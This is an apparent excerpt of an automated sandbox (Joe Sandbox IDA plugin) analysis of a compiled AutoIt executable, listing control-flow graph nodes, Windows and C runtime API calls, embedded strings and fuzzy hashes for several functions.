87195 417f77 __mbstowcs_l_helper 46 API calls 87187->87195 87188->87179 87191 41b1e5 GetConsoleCP 87188->87191 87189->87187 87199 41b648 WideCharToMultiByte 87189->87199 87190->87187 87202 41b579 WriteFile 87190->87202 87191->87216 87219 41b208 87191->87219 87192->87161 87193->87187 87194 41b49f WriteFile 87193->87194 87194->87186 87198 41b4d3 87194->87198 87197 41b784 87195->87197 87196 41b734 87200 41b753 87196->87200 87201 41b73f 87196->87201 87203 417f8a __write_nolock 46 API calls 87197->87203 87198->87193 
87208 41b4f8 87198->87208 87198->87216 87199->87186 87205 41b67f WriteFile 87199->87205 87206 417f9d __dosmaperr 46 API calls 87200->87206 87204 417f77 __mbstowcs_l_helper 46 API calls 87201->87204 87202->87186 87207 41b5ad 87202->87207 87203->87192 87209 41b744 87204->87209 87210 41b6b6 GetLastError 87205->87210 87213 41b6aa 87205->87213 87206->87192 87207->87190 87207->87208 87207->87216 87208->87216 87212 417f8a __write_nolock 46 API calls 87209->87212 87210->87213 87211 4131e9 __write_nolock 56 API calls 87211->87219 87212->87192 87213->87189 87213->87205 87213->87208 87213->87216 87214 420955 58 API calls __fassign 87214->87219 87215 41b2b4 WideCharToMultiByte 87215->87216 87217 41b2e5 WriteFile 87215->87217 87216->87187 87216->87192 87216->87196 87217->87186 87218 41b30c 87217->87218 87218->87186 87218->87216 87218->87219 87220 4221f0 WriteConsoleW CreateFileW __write_nolock 87218->87220 87221 41b339 WriteFile 87218->87221 87219->87211 87219->87214 87219->87215 87219->87216 87219->87218 87220->87218 87221->87186 87221->87218 87222->87121 87223->87133 87224->87125 87225->87128 87226->87133 87227->87137 87228->87136 87229->87133 87233 414910 __wfsopen 87230->87233 87231 414923 87286 417f77 46 API calls __getptd_noexit 87231->87286 87233->87231 87235 414951 87233->87235 87234 414928 87287 417f25 10 API calls __mbstowcs_l_helper 87234->87287 87249 41d4d1 87235->87249 87238 414956 87239 41496a 87238->87239 87240 41495d 87238->87240 87242 414992 87239->87242 87243 414972 87239->87243 87288 417f77 46 API calls __getptd_noexit 87240->87288 87266 41d218 87242->87266 87289 417f77 46 API calls __getptd_noexit 87243->87289 87246 414933 __wfsopen @_EH4_CallFilterFunc@8 87246->87017 87250 41d4dd __wfsopen 87249->87250 87251 4182cb __lock 46 API calls 87250->87251 87264 41d4eb 87251->87264 87252 41d560 87291 41d5fb 87252->87291 87253 41d567 87255 416b04 __malloc_crt 46 API calls 87253->87255 87256 41d56e 87255->87256 87256->87252 87258 41d57c 
InitializeCriticalSectionAndSpinCount 87256->87258 87257 41d5f0 __wfsopen 87257->87238 87259 41d59c 87258->87259 87260 41d5af EnterCriticalSection 87258->87260 87263 413748 _free 46 API calls 87259->87263 87260->87252 87261 418209 __mtinitlocknum 46 API calls 87261->87264 87263->87252 87264->87252 87264->87253 87264->87261 87294 4154b2 47 API calls __lock 87264->87294 87295 415520 LeaveCriticalSection LeaveCriticalSection _doexit 87264->87295 87267 41d23a 87266->87267 87268 41d255 87267->87268 87280 41d26c __wopenfile 87267->87280 87300 417f77 46 API calls __getptd_noexit 87268->87300 87270 41d421 87273 41d47a 87270->87273 87274 41d48c 87270->87274 87271 41d25a 87301 417f25 10 API calls __mbstowcs_l_helper 87271->87301 87305 417f77 46 API calls __getptd_noexit 87273->87305 87297 422bf9 87274->87297 87277 41499d 87290 4149b8 LeaveCriticalSection LeaveCriticalSection __wfsopen 87277->87290 87278 41d47f 87306 417f25 10 API calls __mbstowcs_l_helper 87278->87306 87280->87270 87280->87273 87280->87280 87302 41341f 58 API calls 2 library calls 87280->87302 87282 41d41a 87282->87270 87303 41341f 58 API calls 2 library calls 87282->87303 87284 41d439 87284->87270 87304 41341f 58 API calls 2 library calls 87284->87304 87286->87234 87287->87246 87288->87246 87289->87246 87290->87246 87296 4181f2 LeaveCriticalSection 87291->87296 87293 41d602 87293->87257 87294->87264 87295->87264 87296->87293 87307 422b35 87297->87307 87299 422c14 87299->87277 87300->87271 87301->87277 87302->87282 87303->87284 87304->87270 87305->87278 87306->87277 87308 422b41 __wfsopen 87307->87308 87309 422b54 87308->87309 87312 422b8a 87308->87312 87310 417f77 __mbstowcs_l_helper 46 API calls 87309->87310 87311 422b59 87310->87311 87313 417f25 __mbstowcs_l_helper 10 API calls 87311->87313 87314 422400 __tsopen_nolock 109 API calls 87312->87314 87317 422b63 __wfsopen 87313->87317 87315 422ba4 87314->87315 87316 422bcb __wsopen_helper LeaveCriticalSection 87315->87316 87316->87317 87317->87299 87321 
4150dd __wfsopen 87318->87321 87319 4150e9 87349 417f77 46 API calls __getptd_noexit 87319->87349 87321->87319 87322 41510f 87321->87322 87331 415471 87322->87331 87323 4150ee 87350 417f25 10 API calls __mbstowcs_l_helper 87323->87350 87330 4150f9 __wfsopen 87330->87019 87332 415483 87331->87332 87333 4154a5 EnterCriticalSection 87331->87333 87332->87333 87335 41548b 87332->87335 87334 415117 87333->87334 87337 415047 87334->87337 87336 4182cb __lock 46 API calls 87335->87336 87336->87334 87338 415057 87337->87338 87340 415067 87337->87340 87400 417f77 46 API calls __getptd_noexit 87338->87400 87339 415079 87369 41443c 87339->87369 87340->87339 87352 414e4e 87340->87352 87344 41505c 87351 415143 LeaveCriticalSection LeaveCriticalSection __wfsopen 87344->87351 87346 414139 __flsbuf 46 API calls 87347 4150b9 87346->87347 87375 41e1f4 87347->87375 87349->87323 87350->87330 87351->87330 87353 414e61 87352->87353 87354 414e79 87352->87354 87401 417f77 46 API calls __getptd_noexit 87353->87401 87355 414139 __flsbuf 46 API calls 87354->87355 87357 414e80 87355->87357 87360 41e1f4 __write 51 API calls 87357->87360 87358 414e66 87402 417f25 10 API calls __mbstowcs_l_helper 87358->87402 87361 414e97 87360->87361 87362 414f09 87361->87362 87364 414ec9 87361->87364 87368 414e71 87361->87368 87403 417f77 46 API calls __getptd_noexit 87362->87403 87365 41e1f4 __write 51 API calls 87364->87365 87364->87368 87366 414f64 87365->87366 87367 41e1f4 __write 51 API calls 87366->87367 87366->87368 87367->87368 87368->87339 87370 414455 87369->87370 87371 414477 87369->87371 87370->87371 87372 414139 __flsbuf 46 API calls 87370->87372 87371->87346 87373 414470 87372->87373 87374 41b7b2 __write 77 API calls 87373->87374 87374->87371 87376 41e200 __wfsopen 87375->87376 87377 41e223 87376->87377 87378 41e208 87376->87378 87379 41e22f 87377->87379 87385 41e269 87377->87385 87414 417f8a 46 API calls __getptd_noexit 87378->87414 87416 417f8a 46 API calls __getptd_noexit 87379->87416 87381 
41e20d 87415 417f77 46 API calls __getptd_noexit 87381->87415 87384 41e234 87417 417f77 46 API calls __getptd_noexit 87384->87417 87388 41ae56 ___lock_fhandle 48 API calls 87385->87388 87386 41e215 __wfsopen 87386->87344 87389 41e26f 87388->87389 87391 41e291 87389->87391 87392 41e27d 87389->87392 87390 41e23c 87418 417f25 10 API calls __mbstowcs_l_helper 87390->87418 87419 417f77 46 API calls __getptd_noexit 87391->87419 87404 41e17f 87392->87404 87396 41e296 87420 417f8a 46 API calls __getptd_noexit 87396->87420 87397 41e289 87421 41e2c0 LeaveCriticalSection __unlock_fhandle 87397->87421 87400->87344 87401->87358 87402->87368 87403->87368 87405 41aded __chsize_nolock 46 API calls 87404->87405 87406 41e18e 87405->87406 87407 41e1a4 SetFilePointer 87406->87407 87408 41e194 87406->87408 87410 41e1c3 87407->87410 87411 41e1bb GetLastError 87407->87411 87409 417f77 __mbstowcs_l_helper 46 API calls 87408->87409 87412 41e199 87409->87412 87410->87412 87413 417f9d __dosmaperr 46 API calls 87410->87413 87411->87410 87412->87397 87413->87412 87414->87381 87415->87386 87416->87384 87417->87390 87418->87386 87419->87396 87420->87397 87421->87386 87423 4149ea 87422->87423 87424 4149fe 87422->87424 87468 417f77 46 API calls __getptd_noexit 87423->87468 87425 4149fa 87424->87425 87428 41443c __flush 77 API calls 87424->87428 87440 414ab2 LeaveCriticalSection LeaveCriticalSection __wfsopen 87425->87440 87427 4149ef 87469 417f25 10 API calls __mbstowcs_l_helper 87427->87469 87430 414a0a 87428->87430 87441 41d8c2 87430->87441 87433 414139 __flsbuf 46 API calls 87434 414a18 87433->87434 87445 41d7fe 87434->87445 87436 414a1e 87436->87425 87437 413748 _free 46 API calls 87436->87437 87437->87425 87438->87032 87439->87037 87440->87037 87442 414a12 87441->87442 87443 41d8d2 87441->87443 87442->87433 87443->87442 87444 413748 _free 46 API calls 87443->87444 87444->87442 87446 41d80a __wfsopen 87445->87446 87447 41d812 87446->87447 87448 41d82d 87446->87448 87485 417f8a 46 API calls 
__getptd_noexit 87447->87485 87449 41d839 87448->87449 87455 41d873 87448->87455 87487 417f8a 46 API calls __getptd_noexit 87449->87487 87451 41d817 87486 417f77 46 API calls __getptd_noexit 87451->87486 87454 41d83e 87488 417f77 46 API calls __getptd_noexit 87454->87488 87458 41ae56 ___lock_fhandle 48 API calls 87455->87458 87456 41d81f __wfsopen 87456->87436 87459 41d879 87458->87459 87461 41d893 87459->87461 87462 41d887 87459->87462 87460 41d846 87489 417f25 10 API calls __mbstowcs_l_helper 87460->87489 87490 417f77 46 API calls __getptd_noexit 87461->87490 87470 41d762 87462->87470 87466 41d88d 87491 41d8ba LeaveCriticalSection __unlock_fhandle 87466->87491 87468->87427 87469->87425 87492 41aded 87470->87492 87472 41d7c8 87505 41ad67 47 API calls 2 library calls 87472->87505 87474 41d772 87474->87472 87476 41aded __chsize_nolock 46 API calls 87474->87476 87484 41d7a6 87474->87484 87475 41aded __chsize_nolock 46 API calls 87477 41d7b2 CloseHandle 87475->87477 87480 41d79d 87476->87480 87477->87472 87481 41d7be GetLastError 87477->87481 87478 41d7f2 87478->87466 87479 41d7d0 87479->87478 87506 417f9d 46 API calls 3 library calls 87479->87506 87483 41aded __chsize_nolock 46 API calls 87480->87483 87481->87472 87483->87484 87484->87472 87484->87475 87485->87451 87486->87456 87487->87454 87488->87460 87489->87456 87490->87466 87491->87456 87493 41ae12 87492->87493 87494 41adfa 87492->87494 87497 417f8a __write_nolock 46 API calls 87493->87497 87498 41ae51 87493->87498 87495 417f8a __write_nolock 46 API calls 87494->87495 87496 41adff 87495->87496 87499 417f77 __mbstowcs_l_helper 46 API calls 87496->87499 87500 41ae23 87497->87500 87498->87474 87502 41ae07 87499->87502 87501 417f77 __mbstowcs_l_helper 46 API calls 87500->87501 87503 41ae2b 87501->87503 87502->87474 87504 417f25 __mbstowcs_l_helper 10 API calls 87503->87504 87504->87502 87505->87479 87506->87478 87508 414c82 __wfsopen 87507->87508 87509 414cc3 87508->87509 87510 414cbb __wfsopen 87508->87510 87514 
414c96 __cftof2_l 87508->87514 87511 415471 __lock_file 47 API calls 87509->87511 87510->87042 87513 414ccb 87511->87513 87520 414aba 87513->87520 87534 417f77 46 API calls __getptd_noexit 87514->87534 87515 414cb0 87535 417f25 10 API calls __mbstowcs_l_helper 87515->87535 87524 414ad8 __cftof2_l 87520->87524 87527 414af2 87520->87527 87521 414ae2 87587 417f77 46 API calls __getptd_noexit 87521->87587 87523 414ae7 87588 417f25 10 API calls __mbstowcs_l_helper 87523->87588 87524->87521 87524->87527 87531 414b2d 87524->87531 87536 414cfa LeaveCriticalSection LeaveCriticalSection __wfsopen 87527->87536 87528 414c38 __cftof2_l 87590 417f77 46 API calls __getptd_noexit 87528->87590 87529 414139 __flsbuf 46 API calls 87529->87531 87531->87527 87531->87528 87531->87529 87537 41dfcc 87531->87537 87567 41d8f3 87531->87567 87589 41e0c2 46 API calls 3 library calls 87531->87589 87534->87515 87535->87510 87536->87510 87538 41dfd8 __wfsopen 87537->87538 87539 41dfe0 87538->87539 87540 41dffb 87538->87540 87660 417f8a 46 API calls __getptd_noexit 87539->87660 87541 41e007 87540->87541 87546 41e041 87540->87546 87662 417f8a 46 API calls __getptd_noexit 87541->87662 87544 41dfe5 87661 417f77 46 API calls __getptd_noexit 87544->87661 87545 41e00c 87663 417f77 46 API calls __getptd_noexit 87545->87663 87549 41e063 87546->87549 87550 41e04e 87546->87550 87551 41ae56 ___lock_fhandle 48 API calls 87549->87551 87665 417f8a 46 API calls __getptd_noexit 87550->87665 87553 41e069 87551->87553 87555 41e077 87553->87555 87556 41e08b 87553->87556 87554 41e053 87666 417f77 46 API calls __getptd_noexit 87554->87666 87591 41da15 87555->87591 87667 417f77 46 API calls __getptd_noexit 87556->87667 87561 41e014 87664 417f25 10 API calls __mbstowcs_l_helper 87561->87664 87562 41e083 87669 41e0ba LeaveCriticalSection __unlock_fhandle 87562->87669 87563 41e090 87668 417f8a 46 API calls __getptd_noexit 87563->87668 87566 41dfed __wfsopen 87566->87531 87568 41d900 87567->87568 87572 41d915 87567->87572 
87670 417f77 46 API calls __getptd_noexit 87568->87670 87570 41d910 87570->87531 87571 41d905 87671 417f25 10 API calls __mbstowcs_l_helper 87571->87671 87572->87570 87574 41d94a 87572->87574 87575 420603 __getbuf 46 API calls 87572->87575 87576 414139 __flsbuf 46 API calls 87574->87576 87575->87574 87577 41d95e 87576->87577 87578 41dfcc __read 59 API calls 87577->87578 87579 41d965 87578->87579 87579->87570 87580 414139 __flsbuf 46 API calls 87579->87580 87581 41d988 87580->87581 87581->87570 87582 414139 __flsbuf 46 API calls 87581->87582 87583 41d994 87582->87583 87583->87570 87584 414139 __flsbuf 46 API calls 87583->87584 87585 41d9a1 87584->87585 87586 414139 __flsbuf 46 API calls 87585->87586 87586->87570 87587->87523 87588->87527 87589->87531 87590->87523 87592 41da31 87591->87592 87593 41da4c 87591->87593 87594 417f8a __write_nolock 46 API calls 87592->87594 87595 41da5b 87593->87595 87597 41da7a 87593->87597 87596 41da36 87594->87596 87598 417f8a __write_nolock 46 API calls 87595->87598 87599 417f77 __mbstowcs_l_helper 46 API calls 87596->87599 87601 41da98 87597->87601 87613 41daac 87597->87613 87600 41da60 87598->87600 87614 41da3e 87599->87614 87604 417f77 __mbstowcs_l_helper 46 API calls 87600->87604 87602 417f8a __write_nolock 46 API calls 87601->87602 87605 41da9d 87602->87605 87603 41db02 87607 417f8a __write_nolock 46 API calls 87603->87607 87606 41da67 87604->87606 87609 417f77 __mbstowcs_l_helper 46 API calls 87605->87609 87610 417f25 __mbstowcs_l_helper 10 API calls 87606->87610 87608 41db07 87607->87608 87611 417f77 __mbstowcs_l_helper 46 API calls 87608->87611 87612 41daa4 87609->87612 87610->87614 87611->87612 87616 417f25 __mbstowcs_l_helper 10 API calls 87612->87616 87613->87603 87613->87614 87615 41dae1 87613->87615 87617 41db1b 87613->87617 87614->87562 87615->87603 87620 41daec ReadFile 87615->87620 87616->87614 87619 416b04 __malloc_crt 46 API calls 87617->87619 87621 41db31 87619->87621 87622 41dc17 87620->87622 87623 41df8f 

Control-flow Graph

APIs
• GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
  • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\x.exe,00000104,?), ref: 00401F4C
  • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
  • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
  • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
  • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
  • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
• IsDebuggerPresent.KERNEL32 ref: 0040D5B6
• GetFullPathNameW.KERNEL32(C:\Users\user\AppData\Local\Temp\x.exe,00000104,?,004A7F50,004A7F54), ref: 0040D625
  • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
• SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
• MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
• SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
• GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
• GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
• ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
  • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
  • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
  • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
  • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
  • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
  • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
  • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
  • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
  • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
  • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
  • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
  • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\x.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                                                                                                                    • API String ID: 2495805114-1096746028
                                                                                                                                                    • Opcode ID: e8c9047fb359c29ec9f900fe27c3aa55fa0c8583f95d62b388df9f145cb8bf6e
                                                                                                                                                    • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
                                                                                                                                                    • Opcode Fuzzy Hash: e8c9047fb359c29ec9f900fe27c3aa55fa0c8583f95d62b388df9f145cb8bf6e
                                                                                                                                                    • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 1187 40e500-40e57c call 40bc70 GetVersionExW call 402160 call 40e660 call 40e680 1196 40e582-40e583 1187->1196 1197 427674-427679 1187->1197 1200 40e585-40e596 1196->1200 1201 40e5ba-40e5cb call 40ef60 1196->1201 1198 427683-427686 1197->1198 1199 42767b-427681 1197->1199 1203 427693-427696 1198->1203 1204 427688-427691 1198->1204 1202 4276b4-4276be 1199->1202 1205 427625-427629 1200->1205 1206 40e59c-40e59f 1200->1206 1218 40e5ec-40e60c 1201->1218 1219 40e5cd-40e5e6 GetCurrentProcess call 40ef20 1201->1219 1220 4276c6-4276ca GetSystemInfo 1202->1220 1203->1202 1210 427698-4276a8 1203->1210 1204->1202 1212 427636-427640 1205->1212 1213 42762b-427631 1205->1213 1208 40e5a5-40e5ae 1206->1208 1209 427654-427657 1206->1209 1214 40e5b4 1208->1214 1215 427645-42764f 1208->1215 1209->1201 1221 42765d-42766f 1209->1221 1216 4276b0 1210->1216 1217 4276aa-4276ae 1210->1217 1212->1201 1213->1201 1214->1201 1215->1201 1216->1202 1217->1202 1222 40e612-40e623 call 40efd0 1218->1222 1223 4276d5-4276df GetSystemInfo 1218->1223 1219->1218 1231 40e5e8 1219->1231 1220->1223 1221->1201 1222->1220 1228 40e629-40e63f call 40ef90 GetNativeSystemInfo 1222->1228 1233 40e641-40e642 FreeLibrary 1228->1233 1234 40e644-40e651 1228->1234 1231->1218 1233->1234 1235 40e653-40e654 FreeLibrary 1234->1235 1236 40e656-40e65d 1234->1236 1235->1236
APIs
• GetVersionExW.KERNEL32(?), ref: 0040E52A
  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
• GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
• GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
• FreeLibrary.KERNEL32(?), ref: 0040E642
• FreeLibrary.KERNEL32(?), ref: 0040E654
Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
• String ID: 0SH$Wu
• API String ID: 3363477735-1135818761
• Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
• Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
• Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
• Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
APIs
• LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
• GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: IsThemeActive$uxtheme.dll
• API String ID: 2574300362-3542929980
• Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
• Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
• Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
• Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
APIs
• SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040D779
• FreeLibrary.KERNEL32(?), ref: 0040D78E
Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: FreeInfoLibraryParametersSystem
• String ID: Wu
• API String ID: 3403648963-4083010176
• Opcode ID: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
• Instruction ID: 5fcdf068f8d8459ddaa7ea8882eac3df2259875866eaebb33036fc29c92b3e87
• Opcode Fuzzy Hash: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
• Instruction Fuzzy Hash: BB2184719083019FC300DF5ADC8190ABBE4FB84358F40493FF988A7392D735D9458B9A
APIs
• GetFileAttributesW.KERNELBASE(?,00000000), ref: 004339C7
• FindFirstFileW.KERNELBASE(?,?), ref: 004339D8
• FindClose.KERNEL32(00000000), ref: 004339EB
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: FileFind$AttributesCloseFirst
• String ID:
• API String ID: 48322524-0
• Opcode ID: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
• Instruction ID: b419dbaef297d354eb99830e4178f101d1a7f75c7260f3cbf0392e7d05c3e8e7
• Opcode Fuzzy Hash: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
• Instruction Fuzzy Hash: 22E092328145189B8610AA78AC0D4EE779CDF0A236F100B56FE38C21E0D7B49A9047DA
APIs
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
• Sleep.KERNEL32(0000000A,?), ref: 004094D1
• TranslateMessage.USER32(?), ref: 00409556
• DispatchMessageW.USER32(?), ref: 00409561
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
Strings
Memory Dump Source
• Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_x.jbxd
Similarity
• API ID: Message$Peek$DispatchSleepTranslate
• String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
• API String ID: 1762048999-758534266
• Opcode ID: f563e2a7d89e8d19bde99fd3a4c7adcde2789a6e64fa40d9a2f9d65c4e7ca17d
                                                                                                                                                    • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                                                                                                                                                    • Opcode Fuzzy Hash: f563e2a7d89e8d19bde99fd3a4c7adcde2789a6e64fa40d9a2f9d65c4e7ca17d
                                                                                                                                                    • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A

Control-flow Graph

APIs
